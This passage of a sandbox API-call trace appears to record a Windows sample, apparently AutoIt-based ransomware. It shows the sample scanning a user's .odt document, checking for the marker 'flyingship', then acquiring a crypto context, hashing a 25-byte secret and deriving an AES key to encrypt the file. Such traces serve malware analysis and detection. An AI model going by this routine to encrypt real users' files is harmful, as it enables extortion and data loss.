HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="biNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.807] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.807] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0172.807] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0172.807] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.807] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.807] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.807] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.807] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.807] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.808] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0734080, ftCreationTime.dwHighDateTime=0x1d5e226, ftLastAccessTime.dwLowDateTime=0x8494bac0, ftLastAccessTime.dwHighDateTime=0x1d5e4b9, ftLastWriteTime.dwLowDateTime=0x8494bac0, ftLastWriteTime.dwHighDateTime=0x1d5e4b9, nFileSizeHigh=0x0, nFileSizeLow=0x118f8, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="P_2cHhLM.odt", cAlternateFileName="")) returned 0x90ae18 [0172.808] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0172.808] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.808] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.808] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.808] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.808] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0172.808] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.808] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0172.808] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.808] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.810] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0172.810] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.810] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.810] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.810] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.810] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.810] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0172.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.810] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0172.811] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.811] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.811] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0172.811] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.812] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.812] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.812] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.812] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.812] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.812] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.812] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.812] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.812] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.812] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.812] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.812] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0172.812] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.812] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.812] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.812] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.812] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.812] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0172.812] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.812] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.812] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.813] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.813] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.813] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.813] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.813] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.813] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.813] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.813] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0172.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.813] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0172.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.813] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.814] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.814] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0172.814] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.814] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.814] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.815] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.815] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.815] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.815] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.815] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0172.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.815] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.815] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0172.816] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") 